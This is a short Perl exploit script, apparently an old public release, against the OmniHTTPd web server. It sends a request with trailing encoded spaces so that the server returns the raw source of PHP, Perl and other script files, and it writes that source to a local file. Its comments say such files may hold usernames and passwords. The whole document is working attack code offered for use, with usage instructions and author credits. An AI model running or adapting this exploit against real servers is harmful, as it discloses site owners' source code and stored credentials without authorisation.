#!/usr/bin/perl #Omnihttpd server exploit to get te source of php and pl amd other files wich may contain usernames and passwords #written bij speedy #website http://www.dutchriot.com #Cheers to irc.grunn.org # #bug found by #403 Security Lab <<== #www.403-security.org use IO::Socket; my ($port, $sock,$server); $server="$ARGV[0]"; $s="$server"; $port="80"; $file="$ARGV[1]"; $sed=@ARGV; if ($sed <2) { print "\n\nusage: omnised.pl [host] [file]\n\n"; } else { &connect; sub connect { $string="GET /$file%20%20\n\n"; my($iaddr,$paddr,$proto); $iaddr = inet_aton($server) || die "Error: $!"; $paddr = sockaddr_in($port, $iaddr) || die "Error: $!"; $proto = getprotobyname('tcp') || die "Error: $!"; socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!"; connect(SOCK, $paddr) || die "Error: $!"; send(SOCK, $string, 0) || die "Can't to send packet: $!"; open(OUT, ">sed.txt"); print "\n\nStart dumping source of $file to sed.txt\n\n"; while(<SOCK>) { print OUT <SOCK>; } close OUT; close(SOCK); print "All Done the source is dumped in sed.txt\n\n"; print "Please Visit http://www.dutchriot.com\n\n"; exit(1); } }